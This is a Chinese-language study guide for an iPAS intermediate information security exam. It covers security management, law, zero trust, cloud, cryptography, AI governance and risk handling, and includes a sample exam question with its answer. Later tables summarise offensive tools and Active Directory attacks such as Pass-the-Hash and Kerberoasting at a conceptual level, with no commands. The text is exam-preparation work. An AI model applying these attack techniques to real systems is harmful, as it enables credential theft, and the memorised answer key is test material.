iPAS 資訊安全工程師中級考試重點整理

# iPAS 資訊安全工程師中級考試重點整理 > **最後修改日期**：2026/04/03 > **📌 使用說明** > > 本筆記係參考 iPAS 資訊安全工程師中級考試大綱，並採用 114 年度考題回推整理。 > > **閱讀前提**： > - 中級考試假設初級內容已熟悉，基礎定義不重複整理，請參考 [初級筆記](https://hackmd.io/@hiiii/BJYND6jE-g) > - 中級範圍廣泛，建議至少研讀近三年考古題，而非僅看一年 > - 已有國際資安證照（如 CISSP、CEH、CISA）者，實務面會有基礎，但仍需補法規面 > > **備考策略**： > - 考古題不是背答案，而是透過題目找出自己不熟的領域，再針對性補強 > - 留意當年度的政府政策與資安趨勢，iPAS 命題會跟著走（例如：零信任、AI 安全、供應鏈安全） > - **防護實務**歷年通過率約三成，是兩科中較難的，建議多分配時間 > - 每年約有 20-30% 的新題型，無法靠背考古題完全覆蓋，觀念理解比硬記更重要 > > **收錄原則**： > - 常考、重要的觀念會整理成筆記 > - 冷門攻擊手法或單一年度出現的細節題，僅保留考題供參考，不另作筆記 > - 本筆記以 **70 分及格** 為目標編寫，非滿分導向 > > **參考資源**： > - [考試大綱（115 年度簡章）](https://www.ipas.org.tw/ISE) > - [歷年考題](https://ipd.nat.gov.tw/ipas/certification/ISE/learning-resources) > - [114-2 考試應試策略與考題解析](https://hackmd.io/@hiiii/HkDTn4aYbg) # 答題技巧速查 | 出題模式 | 判斷方法 | |:---------|:---------| | 出現「**僅/只/只要**」 | 通常是錯的（防護不完整，單一措施不夠） | | 出現「**完全/絕對/一定**」 | 通常太絕對，是錯的 | | 出現「**黑名單**」過濾 | 通常不夠，應採白名單 | | 出現「**前端驗證**」 | 不可靠，驗證必須在後端 | | 問「最不適切」 | 找範圍太窄、太極端、或搞錯類別的選項 | | 四選一有三個類似 | 答案通常是那個明顯不同類的 | > ⚠️ 以上為常見命題傾向，輔助判斷用，不可取代觀念理解。 --- [TOC] --- # 第一科：資訊安全規劃實務 --- ## 1.1 資訊安全管理系統建置實務與法規遵循 ### CIA 三要素 | 要素 | 定義 | 破壞情境範例 | 常見控制措施 | |:-----|:-----|:-------------|:-------------| | 機密性（C） | 資料不被未授權存取 | 帳號被盜、資料外洩 | MFA、加密（TLS）、存取控制、定期改密碼 | | 完整性（I） | 資料不被未授權修改 | SQL Injection 竄改、勒索軟體加密 | 雜湊驗證、數位簽章、輸入驗證 | | 可用性（A） | 資料或服務可被正常使用 | DDoS、系統當機 | 備援機制、負載平衡、備份 | ### ISO 27001:2022 架構 | 項目 | 內容 | |------|------| | 控制項數量 | 93 項（原 2013 版為 114 項） | | 四大主題 | 組織 37、人員 8、實體 14、技術 34 | | 屬性標籤 | 控制類型（預防/偵測/矯正）、資安特性（CIA）、網路安全概念（識別/保護/偵測/回應/復原） | **ISMS 溝通要素（ISO 27001 第 7.4 條）**：溝通事項、溝通對象、溝通方式、溝通時機 > 💡 ISO 27001 的條文每年會被隨機挑一個出來考（如溝通要素、管理審查輸入、風險評鑑流程等），不可能全部背起來。遇到沒見過的條文，用常識判斷＋刪去法應對即可。 **ISO 27001 vs ISO 27002**： - 27001：要求標準（可驗證），規定「必須做什麼」 - 27002：指引標準（參考用），說明「如何做」 ### 資通安全管理法 **事件通報與復原時限**： | 事件等級 | 通報時限 | 損害控制/復原時限 | |----------|----------|-------------------| | 1、2 級（較輕） | 1 小時內 | 72 小時內 | | 3、4 級（較重） | 1 小時內 | 36 小時內 | **事件等級判斷邏輯**： | 判斷條件 | 等級 | |:---------|:-----| | 非核心業務受影響，可於可容忍中斷時間內復原 | 1、2 級（較輕） | | 核心業務受影響，或無法於可容忍中斷時間內復原 | 3、4 級（較重） | > 口訣：**核心 + 不可容忍 = 重大** **日誌保存期限**：至少 6 個月（等級「普」以上） **委外選任查核重點（資通安全管理法第 10 條）** | 查核項目 | 重點 | |:---------|:-----| | 人員資格 | 資安專業證照、資安訓練、類似業務經驗 | | 複委託 | 是否允許、範圍、對象、受託者資安維護措施 | | 國家機密 | 適任性查核、出境管制 | | 客製化開發 | 安全性檢測證明；核心系統或金額 ≥1000 萬須第三方檢測 | | 事件通報 | 違規或資安事件須立即通知委託機關 | | 契約終止 | 資料返還、移交、刪除或銷毀 | | 定期稽核 | 委託機關應定期確認執行情形 | ### 個人資料保護法 - 蒐集前須告知：機關名稱、蒐集目的、資料類別、利用期間/地區/對象/方式、當事人權利 - 不得要求當事人放棄法定權利（如申請複製本的權利） - 須採行適當安全措施防止個資被竊取、竄改、毀損、滅失或洩漏 ### 上市櫃公司資通安全管控指引 | 項目 | 要求 | |:-----|:-----| | 政策核定層級 | 副總級以上 | | 專責人員 | 須設置資安專責人員 | | 教育訓練 | 落實至每一位成員，並有稽核制度 | **重大資安事件揭露判斷**： - 媒體報導，可能影響投資人決策 - 核心系統/官網無法營運 - 個資/內部文件外洩之虞 - 財務損失可能影響投資決策 ### 其他重要法規 | 法規 | 適用對象 | 重點 | | :--- | :--- | :--- | | **GDPR** | 處理歐盟居民個資的組織 | 不限於歐盟境內公司 | | **HIPAA** | 醫療機構、保險業及相關業務夥伴 | 美國法案，保護「個人醫療健康資訊」(PHI) | | **PCI DSS** | 處理信用卡資訊的組織 | 持卡人資料保護 | | **ISO 27701** | 需個資保護管理的組織 | ISO 27001 延伸，隱私資訊管理（PIMS） | | **BS 10012** | 需個資保護管理的組織 | 英國標準，個人資訊管理 | --- > 📝 **本節相關題目共 14 題** → [前往題庫對應章節](https://hackmd.io/@hiiii/rk0t2YmaWe#11-資訊安全管理系統建置實務與法規遵循) ## 1.2 資安管理實務：存取控制、縱深防禦、職務區隔 (SOD) ### 存取控制模型 | 模型 | 特性 | 適用情境 | |------|------|----------| | DAC（自主式） | 資源擁有者決定權限 | 一般作業系統 | | MAC（強制式） | 系統依標籤強制控制 | 軍事、機密系統 | | RBAC（角色式） | 依角色指派權限 | 企業應用 | | ABAC（屬性式） | 依主體/環境/客體屬性動態決定 | 複雜環境、雲端 | **ABAC 屬性範例**：登入時間、地理位置、設備合規狀態、使用者部門 ### 認證因素 | 因素 | 類型 | 範例 | |:-----|:-----|:-----| | 知識因素 | 你知道什麼 | 密碼、PIN | | 持有因素 | 你擁有什麼 | 智慧卡、Token | | 生物因素 | 你是什麼 | 指紋、虹膜 | **MFA（多因子認證）**：結合兩種以上不同類型的認證因素 **Adaptive MFA（適應性多因子認證）**：根據風險評估（如登入地點、設備、行為）動態調整認證強度 **生物辨識指標**： - FAR（False Accept Rate）：錯誤接受率 - FRR（False Reject Rate）：錯誤拒絕率（Type-I Error） - CER（Crossover Error Rate）：交叉錯誤率，FAR = FRR 的點 **FIDO2 / WebAuthn（防釣魚 MFA）**： - **原理**：使用實體金鑰（如 YubiKey）或裝置內建安全晶片，**簽章驗證取代傳統一次性密碼** - **抗釣魚特性**：金鑰只對「正確網域」回應，釣魚網站騙不到簽章 - **與 OTP 比較**： - OTP：用戶輸入 6 位數字 → 釣魚網站可中繼轉發 - FIDO2：金鑰直接驗證網域 → 釣魚網站拿不到憑證 > 💡 **Phishing-resistant MFA**：NIST SP 800-63 將 FIDO2 與基於 PKI 的智慧卡列為「抗釣魚等級」MFA;傳統簡訊 OTP / 推播驗證屬「非抗釣魚」。 ### 特權帳號管理（PAM） | 控制重點 | 說明 | |:-----|:-----| | 二次驗證 | 高權限帳號必須 MFA（類似銀行轉帳要簡訊驗證碼） | | 行為稽核 | 操作全程留痕，影像錄影或指令日誌 | | 提權核准 | 申請工單 + 主管核可才能取得權限 | | Just-in-Time（JIT） | 即時授予、用完即收回（類似超商兌換券，過期失效） | | 職務區隔（SOD） | 申請者 ≠ 核可者，避免一人獨大 | > 💡 **JIT 即時存取**：傳統 PAM 是「帳號常開但稽核」，JIT 是「平常無權限，需要時才暫時開」 — 攻擊者就算偷到帳號也無法常駐使用。 > 📌 **與 IGA 區別**：PAM 管「特權帳號的使用過程」，IGA 管「一般帳號的整個生命週期」（申請、變動、離職）。 ### 縱深防禦（Defense in Depth）又稱「分層式安全性」，多層次保護，**不依賴單一產品或防線**： 1. 實體安全 2. 網路區隔 3. 主機強化 4. 應用程式防護 5. 資料加密 ### 職務區隔（SOD）確保以下由不同人員擔任： - 申請與核准 - 開發與維運 - 執行與稽核 **有助於 SOD 的措施**：職務輪調、RBAC、定期權限審查 **小型組織無法完全實施時的補償措施**： - 活動監視 - 稽核存底 - 管理監督 --- > 📝 **本節相關題目共 5 題** → [前往題庫對應章節](https://hackmd.io/@hiiii/rk0t2YmaWe#12-資安管理實務存取控制縱深防禦職務區隔-sod) ## 1.3 安全架構規劃實務 ### 零信任架構（ZTA） **核心原則**：永不信任，持續驗證 > ⚠️ ZTA 目前仍在推廣階段，尚未廣為採用 **NIST SP 800-207 核心假設**： - 內部網路不可視為隱式信任區 - 內部設備可能非企業所有或管控 - 任何網路連線（含遠距）皆不可完全信任 - 跨環境移動時須維持一致安全標準 **核心元件**： - PEP（Policy Enforcement Point）：政策執行點 - PDP（Policy Decision Point）：政策決策點 **ZTA 信任評等考量因素**： - 資產狀態（設備合規、健康狀態） - 資源內容（存取的資源類型與敏感度） - 環境因素（時間、地點、網路位置） **CISA ZTA 五大支柱**： | 支柱 | 說明 | 控制範例 | |:-----|:-----|:---------| | Identity（身分） | 身分驗證與管理 | MFA、IAM | | Devices（設備） | 設備信任與合規 | 設備辨識、MDM | | Networks（網路） | 網路存取控制 | 微隔離、RDP 白名單 | | Applications & Workloads（應用程式） | 應用程式安全 | API 安全、容器安全 | | Data（資料） | 資料保護 | DLP、加密 | **橫向能力**： - Visibility and Analytics（可視性與分析） - Automation and Orchestration（自動化與編排） - Governance（治理） **ZTA 成熟度模型（CISA）**： | 階段 | 特性 | |:-----|:-----| | 傳統 | 邊界防護為主 | | 起始 | 開始導入零信任概念 | | 進階 | 部分自動化、融入動態指標 | | 最佳化 | 自動化政策執行、即時偵測回應 | > 金管會《金融業導入零信任架構參考指引》（2024）參考 CISA 模型，分為四級（Level I-IV） --- **ZTNA（Zero Trust Network Access，零信任網路存取）** ZTA 是整體架構，**ZTNA 是其中最常被部署的具體技術**，常被定位為 VPN 的下一代。 | 維度 | 傳統 VPN | ZTNA | |:-----|:-----|:-----| | 連線範圍 | 接通整個內網 | 只開放需要的應用 | | 信任模式 | 一旦驗證即信任 | 每次連線都重新驗證 | | 可見性 | 用戶看到所有內網資源 | 用戶只看到被授權的應用（其他應用不可見） | | 適用情境 | 員工辦公連線 | 遠距 / BYOD / 第三方廠商存取 | > 📌 **記憶法**：VPN 像進「公司大樓」（全部能走），ZTNA 像進「會議室」（只能進指定那一間）。 --- **微切分（Micro-segmentation）— 阻斷橫向移動的關鍵** CISA 五大支柱中「Networks」的核心技術。 - **目的**：就算攻擊者攻入內網，也無法在內網橫向擴散到其他系統 - **作法**：依工作負載（workload）動態套用安全群組，**預設拒絕（Default-deny）** 任何非政策允許的東西流量 - **與傳統 VLAN 區別**： - VLAN：粗粒度切分（部門級） - 微切分：細粒度切分（伺服器對伺服器、容器對容器） > 💡 **為什麼重要**：勒索軟體一旦進入內網，**會橫向掃整個網段**找伺服器加密。微切分讓它「進到一台就被框住」，破壞範圍最小化。 ### NIST CSF 2.0 六大功能： 1. **Govern（治理）**：高層責任、資安納入整體風險管理 2. Identify（識別） 3. Protect（保護） 4. Detect（偵測） 5. Respond（回應） 6. Recover（復原） ### 供應鏈安全 **SBOM（軟體物料清單）**： - 用途：管理第三方套件漏洞 - 常見格式：SPDX、CycloneDX **VEX（Vulnerability Exploitability eXchange，漏洞利用交換）**： - **問題**：SBOM 列出所有第三方元件，但**很多元件雖有漏洞，實際上不會被利用**（因為呼叫路徑沒到那裡） - **VEX 的作用**：標註「這個漏洞在我的軟體裡 **可利用 / 不可利用 / 未受影響**」 - **配套使用**：SBOM 列出元件清單 + VEX 標註可利用性 → 過濾掉假警報，聚焦真風險 > 💡 **生活比喻**：Log4j 大爆發時，所有用 Log4j 的軟體都被警告。但實務上有些只是包進去沒呼叫，根本不會被利用 — VEX 就是讓開發者把這些「假警報」標掉，讓資安團隊聚焦真正要修的。 **委外管理重點**： - 合約明定資安要求 - 事件通報鏈 - 資料返還/刪除/銷毀 - 受託者資安能力審查 **遠端存取安全措施**： | 措施 | 說明 | |:-----|:-----| | MFA | 多重身份驗證 | | VPN | 加密通道存取控制 | | DLP | 防止資料外洩（但無法單獨完成個資保護） | | 傳輸加密 | 保護營業秘密 | ### VDI（虛擬桌面基礎架構） | 項目 | 說明 | |:-----|:-----| | 定義 | 桌面環境集中部署於資料中心，端點僅顯示畫面 | | 核心優勢 | 資料不落地、集中控管、適合遠端辦公 | | 搭配方案 | 精簡用戶端（Thin Client）+ VDI | | 與 VPN 差異 | VPN 加密通道但資料仍在端點；VDI 資料完全不在端點 | ### OT/ICS 安全 **相關標準**：ISO/IEC 62443、NIST SP 800-82 **IT/OT 環境設計原則**： | 原則 | 說明 | |:-----|:-----| | 網路區隔 | IT 環境與 OT 環境必須區隔 | | 獨立基礎設施 | 不共用目錄服務、檔案伺服器 | | 持續更新 | OT 環境仍須更新修補弱點 | **OT 環境導入 ZTA 的挑戰**： - 老舊 ICS 設備不支援現代化身分驗證協定（如 MFA、SAML） - 設備生命週期長（10-20 年），難以汰換 ### 雲端安全責任分配 | 模式 | 客戶負責 | 雲端商負責 | |------|----------|------------| | IaaS | OS（含 Patch）以上全部 | 硬體、虛擬化 | | PaaS | 應用程式、資料 | OS、中介軟體 | | SaaS | 資料、帳號設定 | 所有技術層 | **雲端安全常見威脅（CSA Top Threats）** | 威脅 | 對應控制方向 | |:-----|:-------------| | 配置錯誤與變更控制不足 | 組態管理、變更管理 | | 身分與存取管理（IAM）問題 | 最小權限、MFA | | 不安全的介面與 API | API 安全、輸入驗證 | | 雲端安全策略缺失 | 制定雲端安全政策 | | 不安全的第三方資源 | 供應鏈管理、SBOM | | 不安全的軟體開發 | SDLC、安全編碼 | | 意外的雲端資料洩露 | DLP、加密、存取控制 | | 系統漏洞 | 弱點掃描、修補管理 | | 雲可見性/可觀測性不足 | 日誌、監控、SIEM | | 未驗證的資源共享 | 存取控制、隔離 | | APT | 縱深防禦、威脅偵測 | **雲端安全工具** **CNAPP（Cloud-Native Application Protection Platform）**：雲原生應用程式保護平台，整合多種雲端安全功能 | 工具 | 全稱 | 功能 | |:-----|:-----|:-----| | CSPM | Cloud Security Posture Management | 雲端安全態勢管理，檢查雲端配置是否符合安全基準 | | CWPP | Cloud Workload Protection Platform | 雲端工作負載保護，保護 VM、容器、無伺服器 | | CIEM | Cloud Infrastructure Entitlement Management | 雲端授權管理，管理雲端身分與權限 | > CNAPP = CSPM + CWPP + CIEM 的整合平台 ### 常見加密技術整理 **加密類型比較**： | 類型 | 代表演算法 | 特性 | 用途 | |:-----|:-----------|:-----|:-----| | 對稱式加密 | AES-128/256 | 加解密同一把金鑰、速度快 | 資料加密、磁碟加密（BitLocker） | | 非對稱式加密 | RSA、ECC | 公私鑰配對、速度慢 | 數位簽章、金鑰交換 | | 雜湊函數 | SHA-256、SHA-3 | 不可逆、固定長度輸出 | 完整性驗證、密碼儲存 | **密碼儲存安全性**： | 做法 | 安全性 | 說明 | |:-----|:-------|:-----| | 明文儲存 | ✗ 極危險 | 資料庫外洩即全部曝光 | | 僅雜湊 | △ 不足 | 可被彩虹表攻擊 | | 加鹽雜湊（如 SHA-256 + Salt） | ✓ 安全 | 每筆密碼加上隨機鹽值，防彩虹表 | **TLS 握手簡要流程**： 1. 客戶端發送支援的加密套件清單 2. 伺服器回傳選定的套件 + 數位憑證 3. 客戶端驗證憑證（CA 簽發、有效期、網域） 4. 雙方協商產生對稱式會話金鑰 5. 後續通訊以對稱式加密傳輸 **相關安全機制**： | 機制 | 說明 | |:-----|:-----| | HSTS | 強制瀏覽器使用 HTTPS，防止降級攻擊 | | 憑證釘選（Certificate Pinning） | 綁定特定憑證，防止中間人攻擊 | | TEE（Trusted Execution Environment） | 獨立安全硬體環境，保護金鑰生成與加密操作（如 ARM TrustZone） | | BitLocker | Windows 全磁碟加密，筆電遺失時保護資料 | ### 後量子密碼學（PQC） **定義**：利用現有傳統電腦（CPU、記憶體）即可運行，能抵禦量子電腦攻擊的加密演算法 **量子運算對密碼學的影響**： | 類型 | 影響 | 原因 | |:-----|:-----|:-----| | 對稱式加密 | 安全性減半 | Grover 演算法（AES-256 → 等效 AES-128） | | 非對稱式加密 | 可被破解 | Shor 演算法（RSA、ECC 皆受影響） | **威脅**：「先擷取後解密（Harvest Now, Decrypt Later）」— 攻擊者現在蒐集加密資料，等量子電腦成熟後解密 **應對策略**： - 混合加密模式：同時使用傳統演算法 + PQC 演算法 - 採用標準化 PQC 演算法（如 NIST 標準化的） **注意事項**： - 避免使用未經驗證的「專有」抗量子演算法 - 長期保密資料（如專利、設計圖）應優先評估 ### AI 安全與治理 **ISO 42001**：人工智慧管理系統（AIMS），用於組織 AI 治理與風險管理 **AI 治理合規標準對照** 近年 AI 入考的合規標準逐漸成體系，常考辨識「哪個適用 / 不適用」： | 標準 | 性質 | 適用 | |:-----|:-----|:-----| | **ISO 42001（AIMS）** | 管理系統（可驗證） | 組織建立 AI 治理制度 | | **NIST AI RMF** | 風險管理框架（指導性） | 識別、評估、管理 AI 風險 | | **EU AI Act** | 法令（強制適用） | 在歐盟營運的 AI 系統合規 | | **公部門 AI 應用參考手冊** | 台灣公部門指引 | 政府機關 AI 應用 | | ❌ ISO 27006 | 認證機構規範 | **與 AI 治理無關**（常見干擾項） | > 📌 **EU AI Act 風險分級**：把 AI 系統依風險分四級 — 不可接受（禁止）/ 高風險（嚴格管制）/ 有限風險（揭露義務）/ 最小風險（自由）。台灣 AI 公司若有歐盟客戶，必須符合此分級要求。 **LLM/生成式 AI 安全** OWASP Top 10 for LLM（2025）： | 排名 | 風險 | |:-----|:-----| | LLM01 | Prompt Injection（提示注入） | | LLM02 | Sensitive Information Disclosure（敏感資訊洩露） | | LLM03 | Supply Chain（供應鏈風險） | | LLM04 | Data and Model Poisoning（資料與模型污染） | | LLM05 | Improper Output Handling（不當輸出處理） | | LLM06 | Excessive Agency（過度授權） | | LLM07 | System Prompt Leakage（系統提示洩露） | | LLM08 | Vector and Embedding Weaknesses（向量與嵌入弱點） | | LLM09 | Misinformation（錯誤資訊） | | LLM10 | Unbounded Consumption（無限制資源消耗） | **企業使用 LLM 控制措施**： - 清查並限制非核可的 LLM 服務 - WAF 限制程式片段上傳 - 雲端 API 連結確認與管理 - DLP 防止敏感資訊外洩 - RBAC 限制可存取的知識庫 - Prompt 過濾（防 Prompt Injection） --- > **Q：** 【題組 2】情境如附圖所示。在導入影像辨識、聲音辨識或 AI 模組，為了確保導入系統的可信任性（Trustworthiness），應考量下列哪些項目？（複選） > > **情境**：近年來，人工智慧的應用有效的協助企業組織完成許多艱難的任務，節省大量的人力。然而，結合深度偽造技術（Deepfake）的語音與影像攻擊，使詐騙效果更高。攻擊者可精準模仿組織高層的聲音或影像，誘使受害者放下警戒、依指示行動，導致重大資安風險與營運損失。企業高層要求身為資安長的您規劃一系列的強化機制，以避免組織同仁受騙將公司的款項匯出造成組織的營運損失。 > > 資安部門據此推動以下控制措施： > (1) 阻擋存取深度偽造工具或相關不良內容網站的使用。 > (2) 企業導入影像辨識、聲音辨識或 AI 模組，增加深度偽造攻擊的防禦能力。 > (3) 教育員工辨識深度偽造攻擊（如假冒上司語音指令、影像假訊息等）。 > (4) 財務與會計系統導入多因子認證（Multi-Factor Authentication, MFA），以降低匯款人員身份遭到盜用。 > (5) 電子郵件系統強化安全性，導入電子郵件系統的資料儲存加密技術。 > (6) 加強職務區隔（Segregation of Duties, SoD）：超過一定金額的匯款額度需要經過主管複核同意後始得匯款。 > (7) 採用專有視訊會議系統導入多因子認證，封鎖非公司認可的專有視訊會議系統開會。 > > - $A$ AI 強韌度（AI Robustness） > - $B$ AI 可靠度（AI Reliability） > - $C$ AI 可控性（AI Controllability） > - $D$ AI 系統速度（AI System Speed） <details> <summary>查看答案</summary> **$A$$B$$C$** 這題的正確答案是 $A$、$B$、$C$。在 AI 治理與資訊安全框架（如 NIST AI RMF、ISO/IEC 22989:2022）中，可信任性 $Trustworthiness$ 指的是 AI 系統在面對各種狀況時，能夠表現出準確、安全且符合預期的能力。 **正確選項解析** - **$A$ AI 強韌度 $AI Robustness$**：AI 系統在面對錯誤輸入、異常環境或 **惡意攻擊（Adversarial Attacks）** 時，仍能維持運作且不被輕易誤導的能力。在防禦 Deepfake 的情境中，攻擊者可能在圖片中加入人眼看不見的雜訊來欺騙 AI 偵測模型，如果 AI 不夠強韌，防禦系統形同虛設。 - **$B$ AI 可靠度 $AI Reliability$**：系統在規定的條件與時間內，能持續且穩定地執行預期功能的能力。偵測系統不能「時靈時不靈」，如果 AI 今天能抓到 Deepfake、明天卻漏報，使用者就無法信任該系統的判斷結果。依據 NIST AI 100-1：有效性、準確性、穩健性和可靠性的測量有助於提高系統的可信度。 - **$C$ AI 可控性 $AI Controllability$**：人類能夠監控、干預或在必要時強制停止 AI 系統的能力（Human-in-the-loop）。如果 AI 模組發生誤判（例如把總經理的真實視訊當成 Deepfake 封鎖），管理人員必須有能力介入並覆寫 AI 的決定。 **錯誤選項解析** - **$D$ AI 系統速度 $AI System Speed$**：速度屬於「效能 $Performance/Efficiency$」指標，而非「可信任性」指標。一個運算極快的 AI 系統，如果結果是錯的（不可靠）或容易被駭客騙過（不強韌），它仍然是不可信任的。 > 📖 **參考框架**：ISO/IEC 22989:2022 將 AI Trustworthiness 的特性列為：Robustness、Reliability、Resilience、Controllability、Explainability、Predictability、Transparency、Bias and Fairness 等，不包含 Speed。 </details> --- > 📝 **本節相關題目共 31 題** → [前往題庫對應章節](https://hackmd.io/@hiiii/rk0t2YmaWe#13-安全架構規劃實務) ## 2.1 風險分析與評估 ### 風險管理流程 ``` 建立全景 → 風險識別 → 風險分析 → 風險評估 → 風險處理 └─────── 風險評鑑 ───────┘ ``` ### 建立全景定義範疇與邊界，考量因素： - 組織架構、營運目標、策略及政策 - 適用之法令、法規及契約要求 - 組織整體風險管理作法 - 組織內資訊及資通系統資產及相對應之控制措施 **常見外部合規要求**： | 來源 | 說明 | 範例 | |:-----|:-----|:-----| | 法律（Law） | 國家立法 | 個資法、刑法 | | 法規（Regulation） | 主管機關規定 | 銀行法、資通安全管理法 | | 行業規範 | 產業自律標準 | PCI DSS、銀行公會規範 | | 合約（Contract） | 與第三方約定 | 供應商合約、SLA | ### 風險評鑑三步驟 | 步驟 | 說明 | |:-----|:-----| | 風險識別 | 找出所有風險來源（含不可控制的），可能有多個來源與後果 | | 風險分析 | 評估事件發生的可能性與影響程度 | | 風險評估 | 將分析結果與風險準則比較，決定是否需採取控制措施 | **風險識別項目**： - 資產 - 威脅（含威脅行為者） - 弱點 - 現有控制措施 **威脅行為者（Threat Actors）**： | 類型 | 動機 | 目標 | 威脅程度 | 範例 | |:-----|:-----|:-----|:---------|:-----| | APT / 國家級駭客 | 間諜、癱瘓、情蒐 | 關鍵基礎設施、政府、國防 | 最高 | Volt Typhoon 攻擊美國基礎設施、Sandworm 攻擊烏克蘭電網 | | 駭客行動主義者（Hacktivist） | 政治訴求 | 特定組織、政府網站 | 中 | Anonymous 攻擊政府網站、網頁塗鴉（Defacement） | | 網路罪犯 | 金錢利益 | 個資、金融資料 | 中高 | 勒索軟體集團（如 LockBit）、暗網販售個資 | | 白帽駭客 | 獎金、榮譽 | 漏洞回報 | 無害 | Bug Bounty 漏洞獎勵計畫 | | 內部威脅（蓄意） | 報復、利益 | 內部資料 | 中高 | 離職前複製客戶資料、植入後門 | | 內部威脅（非蓄意） | 無（疏失、粗心） | 非特定 | 中 | 轉帳多打一個零、覆蓋錯誤檔案、誤寄郵件 | > 💡 **弱點 vs 威脅的判斷**：「組織缺了什麼」是弱點（如缺乏教育訓練），「人做了什麼」是威脅事件（如員工誤點釣魚郵件）。同一件事換個描述方式就會換類別，看題目主詞判斷。 **常見弱點分類**： | 類型 | 範例 | 考題常見描述 | |:-----|:-----|:-------------| | 人員弱點 | 缺乏資安意識訓練、未落實職務區隔 | 「員工未受過社交工程訓練」 | | 軟體弱點 | 未修補漏洞、輸入驗證不當、設定錯誤 | 「系統存在 SQL Injection 漏洞」 | | 硬體弱點 | 設備 EOS/EOL、韌體未更新 | 「防火牆已遭原廠宣告終止服務」 | | 網路弱點 | 開放不必要 Port、未加密傳輸、未區隔 IT/OT | 「內部網路未實施微隔離」 | | 流程弱點 | 無變更管理程序、無備份驗證機制 | 「系統更新後未經測試即上線」 | | 實體弱點 | 機房無門禁、無監控 | 「機房未設置環境監控系統」 | > 💡 **同一個人可以同時是弱點和威脅**： > > | 描述 | 分類 | 為什麼 | > |:-----|:-----|:-------| > | 這個員工沒受過社交工程訓練 | 弱點 | 缺陷在那裡，還沒出事 | > | 這個員工點了釣魚郵件 | 威脅事件 | 動了手，事情發生了 | > > 判斷關鍵：**出事了沒有？** 沒出事是弱點，出事了是威脅事件。 > 💡 **弱點 vs 威脅的判斷**：「組織缺了什麼」是弱點（如缺乏教育訓練），「人做了什麼」是威脅事件（如員工誤點釣魚郵件）。同一件事換個描述方式就會換類別，看題目主詞判斷。 >**APT（Advanced Persistent Threat）**：有組織、長期潛伏、針對特定目標的進階攻擊 **風險分析 - 定量分析公式**： | 名詞 | 定義 | 公式 | |:-----|:-----|:-----| | AV | 資產價值 | — | | EF | 曝險因子（損失百分比） | — | | SLE | 單次損失期望值 | AV × EF | | ARO | 年化發生率 | — | | ALE | 年化損失期望值 | SLE × ARO | ### 風險評鑑時機 - 至少每年定期執行 - 營運重大改變時 - 風險處理後（評估殘餘風險） - 執行前應先了解背景資訊（法規、技術環境等） --- > 📝 **本節相關題目共 8 題** → [前往題庫對應章節](https://hackmd.io/@hiiii/rk0t2YmaWe#21-風險分析與評估) ## 2.2 風險處理實務 ### 風險處理四選項 | 選項 | ISO 術語 | 說明 | 範例 | |:-----|:---------|:-----|:-----| | 降低 | Modification | 實施控制措施降低風險 | 導入 PSDLC、安裝防火牆 | | 轉移 | Sharing | 移轉給第三方 | 購買保險、委外 | | 避免 | Avoidance | 移除風險來源 | 停止高風險業務 | | 接受 | Retention | 承受風險 | 記錄並監控 | **選擇風險處理選項的考量因素**： - 組織的目標 - 組織所訂之風險準則 - 可用資源（人力、預算、時間） - 成本效益 **風險處理原則**： - 風險處理選項可組合使用，非相互排斥 - 高風險優先處理，依風險等級排定優先順序 - 導入新控制措施可能產生新風險，需一併管理 **風險處理計畫應包含**： - 如何實施選定之風險處理選項 - 風險處理實施之順序（優先序） - 風險當責者 - 核准與實施人員 **風險擁有者**：負責核准風險處理選項與計畫 **殘餘風險**：處理後剩餘的風險，須經風險擁有者核可，並文件化、定期審查 **資安保險（Cyber Insurance）— 風險轉移實務** 「轉移」選項的最常見實作。考題常問「保險屬於哪一種風險處理」（答：轉移）。 **保險可以涵蓋的損失**： - 資料外洩通報成本（GDPR 通知 / 受影響當事人賠償） - 業務中斷損失（勒索軟體導致無法營業） - 訴訟法律費用 - 數位鑑識調查費 **保險「不能」涵蓋的（常考反面題）**： - ❌ 系統可用性問題（供電中斷、ISP 故障）— 保險不解決基礎設施 - ❌ 預先存在的弱點未修補（投保前已知漏洞） - ❌ 故意造成的損失（內部蓄意人員） > 📌 **題目陷阱**：有題目問「供電風險的最佳措施」，選項裡有「資安保險」— 這是**錯**的，因為保險解決事後賠償，不解決供電可用性。可用性問題要靠 UPS / 雙電源 / 備援站點。 ### 控制措施類型 **依功能**： | 類型 | 英文 | 目的 | 範例 | |:-----|:-----|:-----|:-----| | 預防性 | Preventive | 事前阻止 | 防火牆、存取控制、加密、教育訓練 | | 偵測性 | Detective | 事中發現 | IDS、日誌審核、CCTV | | 矯正性 | Corrective | 事後復原 | 備份還原、修補程式 | | 補償性 | Compensating | 替代控制 | 當主控制無法實施時 | **依實施方式**： | 類型 | 英文 | 範例 | |:-----|:-----|:-----| | 管理性 | Administrative | 政策、程序、教育訓練、背景查核 | | 技術性 | Technical | 防火牆、加密、IDS、存取控制 | | 實體性 | Physical | 門禁、CCTV、警衛、機房環控 | --- > 📝 **本節相關題目共 14 題** → [前往題庫對應章節](https://hackmd.io/@hiiii/rk0t2YmaWe#22-風險處理實務) # 第二科：資訊安全防護實務 ## 3.1 弱點、威脅分類與攻擊手法 ### 弱點分類 | 類型 | 說明 | 範例 | |:-----|:-----|:-----| | 軟體弱點 | 存在於程式碼中 | 邏輯錯誤、輸入驗證不當、設定錯誤 | | 硬體弱點 | 存在於硬體/韌體中 | 記憶體處理不當、Spectre/Meltdown | | 網路弱點 | 網路設計/配置問題 | 開放不必要 Port、未加密傳輸 | | 零日弱點 | 廠商尚未提供修補的漏洞 | 攻擊者先於廠商發現並利用 | ### 常見資安工具 | 工具 | 用途 | |:-----|:-----| | Nmap | 網路掃描、Port 掃描、服務識別 | | Nessus | 系統弱點掃描 | | Fortify | SAST（靜態原始碼分析） | | Hashcat | 密碼雜湊破解 | | John the Ripper | 密碼破解 | | Mimikatz | 提取 Windows 憑證、Kerberos 票據、NTLM 雜湊 | | Metasploit | 滲透測試框架、Exploit 利用 | | Burp Suite | Web 應用程式測試 | | Wireshark | 封包擷取與分析 | | SQLmap | SQL Injection 自動化測試 | | Nikto | Web 伺服器弱點掃描 | ### AD 網域攻擊 | 攻擊手法 | 原理 | |:---------|:-----| | Golden Ticket | 取得 KRBTGT 雜湊偽造票據，取得網域長期控制權 | | Kerberoasting | 針對有 SPN 的帳號，抓票據做離線破解 | | Pass-the-Ticket | 竊取既有 TGT/TGS 票據直接冒用 | | Pass-the-Hash | 使用 NTLM 雜湊直接認證，不需明文密碼 | ### Linux 提權偵察常見指令 | 指令 | 用途 | 攻擊者目的 | 